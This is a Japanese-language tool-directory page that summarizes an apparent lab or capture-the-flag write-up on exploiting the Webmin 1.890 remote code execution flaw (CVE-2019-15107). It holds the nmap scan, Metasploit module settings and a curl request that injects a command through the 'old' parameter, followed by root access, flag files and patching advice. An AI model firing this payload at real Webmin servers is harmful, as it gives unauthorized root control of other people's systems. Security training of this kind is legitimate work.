Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
Project-Exploitation-of-Webmin-Authentication-Vulnerability — 研究目的: Webminバージョン1.890(CVE-2019-15107)におけるリモートコード実行(RCE)脆弱性の包括的な分析と悪用に成功し、最終的に対象システムの完全な制御を獲得すること。 | Kitploit
ツール/GitHubGitHub/artemcyberlab/project-exploitation-of-webmin-authentication-vulnerability
脆弱性分析エクスプロイトウェブアプリケーション悪用ポストエクスプロイトペネトレーションテスト学習と教育ラボと実践
GitHubartemcyberlab/project-exploitation-of-webmin-authentication-vulnerability

Project-Exploitation-of-Webmin-Authentication-Vulnerability

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

研究目的: Webminバージョン1.890(CVE-2019-15107)におけるリモートコード実行(RCE)脆弱性の包括的な分析と悪用に成功し、最終的に対象システムの完全な制御を獲得すること。

リポジトリを見る
1年前未レビュー

研究目的: Webmin バージョン 1.890 におけるリモートコード実行 (RCE) 脆弱性 (CVE-2019-15107) の包括的な分析と正常なエクスプロイトを実施し、最終的にターゲットシステムの完全な制御を獲得することを目的とする。

方法論:

初期偵察:

Nmap を使用したネットワークスキャンの実行:

bash nmap -sV -sC -A -p- 10.201.105.185 ポート 10000 で稼働する Webmin 1.890 サービスを特定

脆弱性分析:

password_change.cgi の脆弱性メカニズムを調査

認証なしでの任意コマンド実行の可能性を確認

エクスプロイト:

2 つの攻撃ベクトルを実装:

Metasploit フレームワークの使用:

bash use exploit/linux/http/webmin_backdoor set RHOSTS 10.201.105.185 set LHOST tun0 exploit curl による手動エクスプロイト:

bash curl -k "https://10.201.105.185:10000/password_change.cgi" -d "user=root&pam=&expired=2&old=test|id&new1=test&new2=test" ポストエクスプロイト:

対話的な root シェルを取得

ファイルシステム分析を実施

フラグファイルを発見:

bash /home/dark/user.txt /root/root.txt 発見事項:

CVE-2019-15107 脆弱性のエクスプロイトに成功

システム上で完全な root 権限を獲得

タイムリーなソフトウェア更新の重要性を実証

技術的結論:

脆弱性により "old" パラメータインジェクションを介した任意コマンド実行が可能

認証チェックの欠如が特に危険

バージョン 1.890 は後のリリースでパッチが適用されたバックドアを含む

セキュリティ推奨事項:

現在の Webmin バージョンへの即時アップグレード

管理パネルへのアクセスを IP で制限

Web アプリケーションの定期的なセキュリティ監査

さらなる研究の方向性:

他の Webmin 脆弱性の分析

Metasploit を使用しないカスタムエクスプロイトの開発

侵害されたシステムにおける永続化手法の調査

本ケーススタディは、タイムリーなシステム更新の極めて重要性と、デプロイ済みソフトウェアにおける継続的な脆弱性監視の必要性を示している。この研究は、基本的なセキュリティ原則を強調すると同時に、現代の Web アプリケーションエクスプロイト技術に関する実践的な知見を提供する。

ツールをダウンロード